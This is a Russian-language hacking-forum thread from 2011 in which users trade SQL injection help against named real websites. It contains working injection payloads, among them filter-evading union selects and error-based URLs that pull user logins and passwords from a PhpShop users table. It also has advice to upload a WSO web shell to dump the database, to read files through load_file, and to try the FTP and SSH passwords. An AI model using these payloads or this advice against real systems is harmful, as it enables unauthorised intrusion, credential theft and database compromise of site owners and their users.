22.06.2011, 14:58
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами:
8328566
Репутация:
935
|
|
Сообщение от alexvrn
-3'/**//*!union*//**//*!select*//**/4--'
показывает страницу с id 4 как вывести версию базы и т.д помогите
Ну по всей видимости вывод попадает в заголовок Location, и очевидней будет сделать так
Код:
-3'/**//*!union*//**//*!select*//**/version()--'
|
|
|
22.06.2011, 15:10
|
|
Познающий
Регистрация: 25.10.2007
Сообщений: 46
С нами:
9761387
Репутация:
2
|
|
Такой вопрос, прочитал через скуль конфиг цмс
dbhost = localhost
dbuser = lalala
dbname = lalal2
dbpass = password
pma на хосте нет, пытаюсь с локалхоста через свой пхпмуадмин подключится
пишу в конфиге phpmyadmin'a
host site.ru
pass lalala,
db и т.п.
пишет (2003) нет конекта к серверу
Вопрос почему? если в конфиге написано сервер дб = localhost
Ну или как можно узнать какой ип у ДБ = \
Порт вроде стандартный, в php.ini смотрел = \
|
|
|
|
22.06.2011, 15:15
|
|
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
С нами:
8866466
Репутация:
564
|
|
вроде и так все понятно что коннект с БД только с локалки + удаленный коннект запрещен... порт то 3306 просканил хоть перед коннектом ?
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
|
|
|
|
22.06.2011, 15:16
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
Сообщение от GroM88
Такой вопрос, прочитал через скуль конфиг цмс
dbhost = localhost
dbuser = lalala
dbname = lalal2
dbpass = password
pma на хосте нет, пытаюсь с локалхоста через свой пхпмуадмин подключится
пишу в конфиге phpmyadmin'a
host site.ru
pass lalala,
db и т.п.
пишет (2003) нет конекта к серверу
Вопрос почему? если в конфиге написано сервер дб = localhost
Ну или как можно узнать какой ип у ДБ = \
Порт вроде стандартный, в php.ini смотрел = \
Потому что localhost. Тебе нужно цепляться к мускулу как по локалке. Выход - шелл.
Хочешь сдампить бд или просто подрубиться - залей шелл типа wso и сдампи бд через настройки ЦМС.
Быстрее и удобнее будет.
|
|
|
|
22.06.2011, 15:17
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами:
8328566
Репутация:
935
|
|
Сообщение от GroM88
Такой вопрос, прочитал через скуль конфиг цмс
dbhost = localhost
dbuser = lalala
dbname = lalal2
dbpass = password
pma на хосте нет, пытаюсь с локалхоста через свой пхпмуадмин подключится
пишу в конфиге phpmyadmin'a
host site.ru
pass lalala,
db и т.п.
пишет (2003) нет конекта к серверу
Вопрос почему? если в конфиге написано сервер дб = localhost
Ну или как можно узнать какой ип у ДБ = \
Порт вроде стандартный, в php.ini смотрел = \
Вероятность то что mysql открыт для доступа из вне (а если и открыт, то чаще всего для определенного хоста) слишком мала. Как вариант можно проверить пароли к фтп или ссш.
И если ты смог прочитать файлы через MySQL инъекцию, значит у тебя file_priv = on, а если в добавок к тому, ты вызвал load_file('/путь/файл') без кодировки (типа hex) то у тебя и magic_quotes_gpc = off, это значит что если ты найдешь полный путь до веб каталога для которого хватит прав на запись, то шелл считай у тебя есть.
|
|
|
|
22.06.2011, 15:36
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами:
8328566
Репутация:
935
|
|
Сообщение от alexvrn
кто поможет мне ))
Код:
http://all-black-lists.com/cat/catalog-4'and(select(max(1))from(phpshop_categories)group/**/by(concat(version(),0x00,floor(rand(0)*2))))and(if(mid(version(),1,1)=5,1,0))='1.html
|
|
|
|
22.06.2011, 15:44
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами:
8328566
Репутация:
935
|
|
Сообщение от alexvrn
как взять phpshop_users
/thread43966.html
|
|
|
|
22.06.2011, 15:51
|
|
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
С нами:
11217866
Репутация:
3812
|
|
Сообщение от BigBear
Где ещё помимо мускула может лежать пасс от админки ?
в файле, в скрипте прописан, в мускуле, но в другой таблице/базе нопремер
__________________
|
|
|
|
22.06.2011, 16:00
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами:
8328566
Репутация:
935
|
|
Сообщение от alexvrn
http://all-black-lists.com/cat/catalog-4'and(select(max(1))from(phpshop_users)group/**/by(concat(0x3a,login,password,floor(rand(0)*2))))a nd(if(mid(0x3a,login,password,1,1)=5,1,0))='1.html
чёт не работает помогите
Сначала прочитай то, что я тебе дал, а потом если возникнут вопросы, задавай их здесь, но только по существу, а не какой то набор буквосимволов что я процитировал.
|
|
|
|
22.06.2011, 21:24
|
|
Познающий
Регистрация: 16.01.2011
Сообщений: 71
С нами:
8063606
Репутация:
-1
|
|
http://rf-cheats.nichost.ru/index.php?styleid=2+3%27 посмотрите пожалуйста вроде как скуль но что-то там не так, после перезагрузки страници пропадает ошибка, и вывести поля не возможно, пробывал blind sql но тоже ничего не выводит так как ошибка куда то деваетса, я заметил что ошибка пропадает после третьего запроса в URLe, что это помогите разобратса
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
